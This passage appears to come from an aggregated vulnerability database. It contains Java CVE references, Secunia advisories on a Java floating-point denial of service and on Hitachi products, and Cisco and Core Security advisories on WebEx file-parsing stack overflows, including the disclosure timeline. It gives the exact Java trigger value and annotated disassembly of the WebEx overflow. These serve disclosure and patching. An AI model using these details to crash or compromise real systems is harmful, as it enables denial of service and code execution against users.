http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774
[ 181 ] CVE-2013-5778
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778
[ 182 ] CVE-2013-5780
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780
[ 183 ] CVE-2013-5782
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782
[ 184 ] CVE-2013-5783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783
[ 185 ] CVE-2013-5784
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784
[ 186 ] CVE-2013-5790
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790
[ 187 ] CVE-2013-5797
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797
[ 188 ] CVE-2013-5800
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800
[ 189 ] CVE-2013-5802
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802
[ 190 ] CVE-2013-5803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803
[ 191 ] CVE-2013-5804
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804
[ 192 ] CVE-2013-5805
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805
[ 193 ] CVE-2013-5806
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806
[ 194 ] CVE-2013-5809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809
[ 195 ] CVE-2013-5814
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814
[ 196 ] CVE-2013-5817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817
[ 197 ] CVE-2013-5820
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820
[ 198 ] CVE-2013-5823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823
[ 199 ] CVE-2013-5825
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825
[ 200 ] CVE-2013-5829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829
[ 201 ] CVE-2013-5830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830
[ 202 ] CVE-2013-5840
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840
[ 203 ] CVE-2013-5842
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842
[ 204 ] CVE-2013-5849
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849
[ 205 ] CVE-2013-5850
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850
[ 206 ] CVE-2013-5851
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851
[ 207 ] CVE-2013-6629
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6629
[ 208 ] CVE-2013-6954
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6954
[ 209 ] CVE-2014-0429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429
[ 210 ] CVE-2014-0446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446
[ 211 ] CVE-2014-0451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451
[ 212 ] CVE-2014-0452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452
[ 213 ] CVE-2014-0453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453
[ 214 ] CVE-2014-0456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456
[ 215 ] CVE-2014-0457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457
[ 216 ] CVE-2014-0458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458
[ 217 ] CVE-2014-0459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459
[ 218 ] CVE-2014-0460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460
[ 219 ] CVE-2014-0461
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461
[ 220 ] CVE-2014-1876
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1876
[ 221 ] CVE-2014-2397
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397
[ 222 ] CVE-2014-2398
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398
[ 223 ] CVE-2014-2403
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403
[ 224 ] CVE-2014-2412
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412
[ 225 ] CVE-2014-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414
[ 226 ] CVE-2014-2421
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421
[ 227 ] CVE-2014-2423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423
[ 228 ] CVE-2014-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201406-32.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Sun Java JDK / JRE / SDK "doubleValue()" Denial of Service
Vulnerability
SECUNIA ADVISORY ID:
SA43262
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43262/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43262
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43262/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43262/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43262
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Konstantin Preiber has reported a vulnerability in Sun Java, which
can be exploited by malicious people to cause a DoS (Denial of
Service).
The vulnerability is caused due to an error in the "doubleValue()"
method in FloatingDecimal.java when converting
"2.2250738585072012e-308" from a string type to a double precision
binary floating point and can be exploited to cause an infinite
loop.
The vulnerability is reported in the following products:
* Sun JDK and JRE 6 Update 23 and prior.
* Sun JDK 5.0 Update 27 and prior.
* Sun SDK 1.4.2_29 and prior.
SOLUTION:
Apply patch via the FPUpdater tool.
PROVIDED AND/OR DISCOVERED BY:
Konstantin Preiber
ORIGINAL ADVISORY:
Oracle:
http://www.oracle.com/technetwork/topics/security/alert-cve-2010-4476-305811.html
Konstantin Preiber:
http://www.exploringbinary.com/why-volatile-fixes-the-2-2250738585072011e-308-bug/comment-page-1/#comment-4645
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201101-0544 | No CVE | Hitachi JP1/NETM/DM Information Disclosure and Denial of Service Vulnerabilities |
CVSS V2: - CVSS V3: - Severity: - |
Hitachi JP1/NETM/DM is prone to a local information-disclosure vulnerability and a denial-of-service vulnerability.
Successfully exploiting these issues may allow an attacker to obtain sensitive information or cause the affected application to crash, denying service to legitimate users. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Hitachi JP1/NETM/DM Products Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43140
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43140/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43140
RELEASE DATE:
2011-02-01
DISCUSS ADVISORY:
http://secunia.com/advisories/43140/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43140/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43140
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in various Hitachi products,
which can be exploited by malicious, local users to potentially gain
knowledge of sensitive information and malicious people to cause a
DoS (Denial of Service).
1) The permissions for certain files are not properly set, which
allows local users to access files that they are not intended to
access.
2) An unspecified error can be exploited to cause a DoS.
SOLUTION:
Update to fixed versions (please see the vendor's advisory for
details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
HS11-001 (Japanese):
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS11-001/index.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201102-0052 | CVE-2010-3269 | Cisco WRF and ARF Player T27LB Vulnerable to stack-based buffer overflow |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Multiple stack-based buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to execute arbitrary code via a crafted (1) .wrf or (2) .arf file, related to use of a function pointer in a callback mechanism. Cisco WebEx is a web conferencing solution. Cisco WebEx provides record format files for storing WebEX meeting notes, and WRF Player is an application for playing back and editing WRF files (files end with a .wrf extension). This vulnerability can be triggered by publishing a .wrf video file in a conference room: .text:6070C272 loc_6070C272: ; CODE XREF: sub_6070C050+255j.text:6070C272 test esi, esi.text:6070C274 jnz short loc_6070C28F.text:6070C276 push ebx.text :6070C277 call dword ptr [ebp+0Ch] ; call to function pointer on the stack.text:6070C27A add esp, 4.text:6070C27D test al, al.text:6070C27F jz loc_6070C374.text:6070C285 mov edi, [ebp+ 0].text:6070C288 mov esi, [ebp+4].text:6070C28B mov eax, [esp+0D98h+var_D80].text:6070C28F.text:6070C28F loc_6070C28F: ; CODE XREF: sub_6070C050+224j.text:6070C28F mov Cl, [edi] ; cl can be controlled, it is read from the malicious .wrf file.text:6070C291 dec esi.text:6070C292 mov [esp+eax+0D 98h+var_C8C], cl ; this mov overflows the stack with user controlled values.text:6070C299 mov ecx, [esp+0D98h+var_D84].text:6070C29D inc edi.text:6070C29E inc eax.text:6070C29F cmp eax, ecx .text:6070C2A1 mov [esp+0D98h+var_D80], eax.text:6070C2A5 jl short loc_6070C272. Cisco WebEx is prone to multiple remote buffer-overflow vulnerabilities because it fails to perform adequate boundary-checks on user-supplied data.
An attacker can exploit these issues to execute arbitrary code with the privileges of the affected application. Failed exploit attempts will result in a denial-of-service condition.
The Cisco WebEx Players are applications that are used to play back
WebEx meeting recordings that have been recorded on the computer of
an on-line meeting attendee. The players can be automatically
installed when the user accesses a recording file that is hosted on a
WebEx server. The player can also be manually installed for offline
playback after downloading the application from www.webex.com
If the WebEx recording player was automatically installed, it will be
automatically upgraded to the latest, non-vulnerable version when
users access a recording file that is hosted on a WebEx server. If
the WebEx recording player was manually installed, users will need to
manually install a new version of the player after downloading the
latest version from www.webex.com
Cisco has released free software updates that address these
vulnerabilities.
Affected Products
=================
Vulnerable Products
+------------------
The vulnerabilities disclosed in this advisory affect the Cisco WebEx
recording players. Microsoft Windows, Apple Mac OS X, and Linux
versions of the player are all affected. Affected versions of the
players are those prior to client builds T27LC SP22 and T27LB SP21
EP3. Customers who have contractual agreements that prevent WebEx
from automatically upgrading a recording player to the latest version
should contact their account manager to determine upgrade options.
To determine whether a Cisco WebEx server is running an affected
version of the WebEx client build, users can log in to their Cisco
WebEx server and go to the Support > Downloads section. The version
of the WebEx client build will be displayed on the right side of the
page under "About Support Center." See "Software Versions and Fixes"
for details.
Details
=======
The WebEx meeting service is a hosted multimedia conferencing
solution that is managed and maintained by Cisco WebEx. The WRF and
ARF file formats are used to store WebEx meeting recordings that have
been recorded on the computer of an on-line meeting attendee. The recording
players can be automatically installed when the user accesses a
recording file that is hosted on a WebEx server (for stream playback
mode). The recording players can also be manually installed after
downloading the application from www.webex.com/downloadplayer.html
to play back recording files locally (for offline
playback mode).
Multiple buffer overflow vulnerabilities exist in the WRF and ARF
players. The vulnerabilities may lead to a crash of the player
application or, in some cases, remote code execution could occur.
To exploit one of these vulnerabilities, the player application would
need to open a malicious WRF or ARF file. An attacker may be able to
accomplish this exploit by providing the malicious recording file
directly to users (for example, by using e-mail) or by directing a
user to a malicious web page.
These vulnerabilities have been assigned the following Common
Vulnerabilities and Exposures (CVE) identifiers:
* CVE-2010-3269
* CVE-2010-3041
* CVE-2010-3042
* CVE-2010-3043
* CVE-2010-3044
Vulnerability Scoring Details
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* Multiple Cisco WebEx Player Buffer Overflow Vulnerabilities
CVSS Base Score - 9.3
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.7
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities described in this
document could result in a crash of the Cisco WebEx ARF Player or WRF
Player application and, in some cases, allow a remote attacker to
execute arbitrary code on the system with the privileges of the user
who is running the recording player application.
Software Versions and Fixes
===========================
When considering software upgrades, also consult http://www.cisco.com/go/psirt
and any subsequent advisories to determine exposure and a
complete upgrade solution.
These vulnerabilities are first fixed in T27LC SP22 and T27LB SP21
EP3.
The client build will be determined after the software is deployed.
The client build is listed in the Support > Downloads section of the
WebEx page after a user authenticates. WebEx bug fixes are cumulative
in a major release. For example, if release 27.22SP.0 is fixed,
release 27.22SP.1 will also have the software fix.
If a recording player was automatically installed, it will be
automatically upgraded to the latest, nonvulnerable version when
users access a recording file that is hosted on a WebEx server.
If a WebEx recording player was manually installed, users will need
to manually install a new version of the player after downloading the
latest version from www.webex.com/downloadplayer.html
Workarounds
===========
There are no workarounds for the vulnerabilities disclosed in this
advisory.
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
Cisco would like to thank these organizations for reporting these
vulnerabilities.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-Feb-01 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/
Cisco WebEx .atp and .wrf Overflow Vulnerabilities
1. *Advisory Information*
Title: Cisco WebEx .atp and .wrf Overflow Vulnerabilities
Advisory ID: CORE-2010-1001
Advisory URL:
[http://www.coresecurity.com/content/webex-atp-and-wrf-overflow-vulnerabilities]
Date published: 2011-01-31
Date of last update: 2011-01-31
Vendors contacted: Cisco
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Stack-based Buffer Overflow [CWE-121], Stack-based Buffer
Overflow [CWE-121]
Impact: Code execution
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
CVE Name: CVE-2010-3269, CVE-2010-3270
Bugtraq ID: N/A
3. *Vulnerability Description*
There are stack overflows on WebEx [1] that can be exploited by sending
maliciously crafted .atp and .wrf files to a vulnerable WebEx user. When
opened, these files trigger a reliably exploitable stack based buffer
overflow. In the .atp case an exception
handler can be overwritten on the stack, and most registers can be
trivially overwritten.
4. *Vulnerable packages*
. Contact Cisco for a list of vulnerable versions.
5. *Non-vulnerable packages*
. Contact Cisco.
6. *Vendor Information, Solutions and Workarounds*
All clients of WebEx Meeting Center should now be running a patched
version according to Cisco. A non-vulnerable version of WebEx Player
should be available at [http://www.webex.com/downloadplayer.html].
7. *Credits*
These vulnerabilities were discovered and researched by Federico Muttis,
Sebastian Tello and Manuel Muradas from Core Security Technologies
during Bugweek 2010 as part of the "Cisco Baby Cisco!" team [2]. The
publication of this advisory was coordinated by Pedro Varangot.
8. *Technical Description*
8.1. *WebEx Player .wrf Buffer Overflow [CVE-2010-3269]*
WebEx Player can be used to playback recordings of WebEx sessions. These
recordings can be stored using the .wrf closed and undocumented file
format. This vulnerability can also be exploited by publishing a .wrf
video file in a meeting, resulting in the compromise of the meeting's
participants. *WebEx Meeting Center .atp Buffer Overflow [CVE-2010-3270]*
WebEx Meeting Center allows polls to be conducted between all
participants of a WebEx session. By serving a specially crafted .atp
file (used for conducting polls) the meeting host can then abruptly
disconnect from the server, and when another client becomes host and
tries to share the .atp file with the other clients arbitrary code
execution is possible on his workstation. If his connection to the
server is then severed by a malicious payload, the .atp file will be
cycled to the next connected client. We
developed trivial examples that take control of EIP using arbitrary
characters.
9. *Report Timeline*
. 2010-10-04:
Core Security Technologies contacts Cisco PSIRT using their provided PGP
key notifying them of the vulnerabilities and sending an advisory draft,
a proof of concept for the WebEx Player vulnerability, and a proof of
concept for the Meeting Center vulnerability including details of how to
reproduce both vulnerabilities, and details about the behaviour of the
PoC for the Player vulnerability on Windows XP SP2 (which overwrites EIP
with 0x41414141 on that platform). October 18th 2010 (a two weeks
timeframe) is set as a potential release date for the advisory. 2010-10-05:
Cisco PSIRT contacts Core stating that their development team is out of
the office till Friday October 8th. November 15th 2010 is mentioned as
an estimated release date for a fix. 2010-10-05:
Core replies to Cisco PSIRT postponing the release date of this advisory
for one week, to Monday October 25th, in order to contemplate the fact
that Cisco's development team is away from office for the week. Further
changes to the release date will be made after receiving technical
feedback. November the 15th is mentioned to be a possible date to settle
on. 2010-10-11:
Cisco PSIRT replies acknowledging "an exception in WebEx player" but
that doesn't overwrite EIP as Core Security Technologies indicated.
Cisco notifies that they were not able to reproduce the crash in WebEx
Meeting Center. Cisco PSIRT also asks for more detailed information
about the version of WebEx Player used. 2010-10-12:
Core sends the requested information, also attaching new proof of
concept exploits for the WebEx Player vulnerability (that now executes
code and launches "calc.exe"), and further details about the steps
needed to reproduce the WebEx Meeting Center crash. Details about the
system where the proof of concept for the WebEx Player vulnerability was
run are asked. Details about the "exception" are also asked, specially
noting that if other registers are overwritten this should be considered
as a vulnerability that would possibly lead to reliable code execution
even if EIP was not modified (as noted by Core on the e-mail where the
PoC was attached). No reply is received to this e-mail. 2010-10-19:
Core resends the previous e-mail asking for news about reproduction of
the vulnerability on Cisco's side and asking if there was any problem in
the reception or interpretation of the last communication. No reply is
received to this e-mail. 2010-10-28:
Core Security Technologies resends the last e-mail, unilaterally
rescheduling the publication of this advisory to November 8th 2010,
which is closer to Cisco's initial estimation for the release of a fix.
Core states its willingness to reschedule this publication date but only
under firm commitment from Cisco to working seriously towards fixing
this issue in a scheduled timeframe. An updated advisory draft is
attached which includes an updated timeline. 2010-10-30:
Cisco PSIRT replies acknowledging the vulnerability, stating that they
were able to reproduce code execution results in the currently released
version of WebEx, and a crash in their current development version.
Cisco also states that there is not information yet from their
development team about when a fix for this vulnerability will be released. 2010-11-09:
Core replies offering more technical details about exploitation if they
are needed, and reminding Cisco that the crash in their development
version may also be exploitable even if the current proof of concept
exploit only crashes it. The publication date for this advisory is
rescheduled to November 22nd 2010. Core states that they will like to
schedule a firm date for the release of information about this
vulnerability to the public and hence would like to get more information
from Cisco about the schedule for the release of a fix. 2010-11-15:
Cisco states that fixed code will be deployed in mid-December, but since
WebEx Meeting Center runs on a SaaS environment it takes about four or
five weeks for all clients to be running the latest version of the code. 2010-12-06:
Cisco contacts Core since no reply was received in the past two weeks,
and clarifies that a fix will be deployed on December 15th and should be
done on January 11th 2011. 2010-12-06:
Core states that they believe this advisory should be released as soon
as the fix is deployed, since diffing the WebEx binary on the client
side gives full details about the WebEx Meeting Center vulnerability to
an average skilled reverse engineer. Core schedules the publication of
this advisory to December 15th 2010. 2010-12-07:
Cisco contacts Core stating that releasing details about this
vulnerability would endanger customers, since there is no action they
can take to protect themselves because the responsibility of upgrading
the code ran by the customer falls on Cisco. Cisco mentions that "many
of these customers are probably shared between Cisco and Core Security". 2010-12-10:
Cisco contacts Core stating that they have just discovered the WebEx
Meeting Center Vulnerability affects a new set of customers that where
not accounted for originally. These are customers running T27SP21 that
can not be upgraded to SP22. An emergency patch will be released for
SP21 in January 2011, and this sets back the date when all clients
should be running an updated version to the "end of January, beginning
of February."
. 2010-12-14:
Core proposes to split this advisory into two different advisories to
better accommodate the WebEx Meeting Center SaaS release cycle. On one
advisory, the .wrf client side vulnerability would be described, and the
other would be dedicated to the WebEx Meeting Center vulnerability that
may compromise a meeting's host computer. Core believes this mitigates
the risk in a more effective way, since clients can update WebEx Player
by themselves on December 15th (the date when Cisco stated the fixed
version would be released) and no details of the Meeting Center
vulnerability would be released until all clients are running an updated
version. 2010-12-15:
Cisco states they wouldn't like the advisory to be splitted, and that
they prefer Core Security Technologies to go ahead and release
information about both vulnerabilities. 2010-12-15:
Core states that they prefer to release two advisories because these are
two different bugs, in two pieces of software, each one of them with a
differently working update channel determined by the vendor. Core also
informs Cisco that the download link for WebEx Player points to a
vulnerable version as of today, and asks Cisco to clarify what date they
meant as mid-December, since Core would like to know when a fixed
version of WebEx Player will be available for download to be able to
publish the WebEx Player vulnerability. 2010-12-16:
Cisco replies saying that releasing two advisories seems like a good
plan to them. Cisco also states that since many of their customers
observe a lockdown policy during the holidays season, they take a "don't
upgrade" policy of their own until Monday January 10th, 2011. That is
the reason why the download link of WebEx Player has not been changed yet. 2011-01-10:
Core states that they are ready to release this advisory on January
11th, and that releasing two separate advisories seems pointless now
because the release date of both would be very similar, and the original
idea was to mitigate the risk posed by the .wrf vulnerability. Core also
states that they are reviewing the best course of action to take with
the issue regarding clients running the old version of WebEx (T27SP21)
that according to Cisco are unable to upgrade to SP22 since this was not
accounted for previously. 2011-01-13:
Core states that since they have committed previously to release the
advisory taking into account Cisco's consideration about their SaaS
patch deploy model, when factoring the issue of clients running the SP21
version of Meeting Center scheduled by Cisco for emergency update on
January, a release date of January the 31st seems reasonable. This date
should be taken as final and Core Security Technologies believes it
takes into account all information given by Cisco about SaaS updating
timeframes. If this is not the case Cisco is asked to rectify ASAP. 2011-01-14:
Cisco confirms that the timeframe (publishing both vulnerabilities on
January 31st) works for them. 2011-01-31:
The advisory CORE-2010-1001 is published.
10. *References*
[1] [http://www.webex.com/]
[2]
[http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=project&name=Bugweek]
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://corelabs.coresecurity.com].
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].
13. *Disclaimer*
The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
iEYEARECAAYFAk1HJwcACgkQyNibggitWa13VwCfVg6jVkuv3PhqmhNqZFIQO7CB
L1YAni1ONdRqEYczbkvki9r0Y7nr9cIQ
=9HdA
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/